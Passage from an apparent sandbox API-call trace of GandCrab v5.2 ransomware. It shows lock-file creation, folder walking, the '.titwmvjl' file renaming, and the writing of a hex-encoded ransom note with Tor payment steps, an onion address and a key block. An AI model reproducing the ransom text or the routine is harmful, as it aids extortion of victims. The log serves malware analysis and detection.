lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0086.039] CloseHandle (hObject=0x2b4) returned 1 [0086.039] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.039] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.040] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1f, wMilliseconds=0x162)) [0086.040] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.040] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.040] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.040] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a09d2ca4deb61a.lock") returned 66 [0086.040] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0086.041] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.041] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.041] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\") returned 42 [0086.041] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\*" [0086.041] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x5037f8 [0086.041] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.041] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0086.042] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.042] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0086.042] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0086.042] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0086.042] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a09d2ca4deb61a.lock" [0086.042] lstrlenW (lpString=".titwmvjl") returned 9 [0086.042] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a09d2ca4deb61a.lock") returned 66 [0086.042] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.042] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 75 [0086.042] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a09d2ca4deb61a.lock") returned 66 [0086.042] lstrlenW (lpString=".lock") returned 5 [0086.042] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.042] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0086.042] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.043] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.043] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0086.043] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0086.043] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0086.043] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\", lpString2="Java" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java" [0086.043] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\" [0086.043] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0086.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.043] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.044] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.044] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.044] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.044] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.044] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.044] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\\\TITWMVJL-DECRYPT.txt") returned 68 [0086.044] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\java\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0086.045] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x